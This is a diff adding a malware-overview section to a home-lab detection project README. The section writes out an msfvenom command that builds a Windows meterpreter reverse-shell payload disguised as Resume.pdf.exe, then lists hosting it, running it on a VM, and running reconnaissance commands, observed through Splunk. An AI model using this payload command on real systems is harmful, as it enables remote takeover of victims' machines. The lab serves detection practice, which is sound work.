josephtperkins1995/homelabdetection/README.md

 - Splunk – SIEM for telemetry and event log collection
 - Command-line tools – net user, net localgroup, ipconfig.
 - Snapshot management – for safe rollback during malware testing

+#Malware Overview
+The malware was a basic reverse shell payload, named Resume.pdf.exe.
+It was generated using msfvenom on Kali Linux, designed to simulate a social engineering attack. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe > Resume.pdf.exe

+Behavior
+- When executed on the Windows VM, the malware initiates a reverse connection to the Kali Linux attacker's handler
+- It spawns cmd.exe as its parent process
+- Once the connection is established, the attacker can interact with the victim machine using a meterpreter shell.

+## Attack Summary
+1. Prepared internal-only virtual network for safe malware testing.

+2. Created malware on Kali Linux and hosted it on a simple HTTP server.

+3. Downloaded and executed the malware on the Windows VM.

+4. From the Kali Linux handler, established a shell on the Windows machine.

+5. Executed reconnaissance commands:

+net user

+net localgroup

+ipconfig

+6. Used Splunk to analyze logs and monitor process behavior and network activity.

+7.Observed process tree:
+Resume.pdf.exe → cmd.exe → system commands

 ## Screenshots

 1. Configured the Windows VM and the Linux VM to be on a secure internal network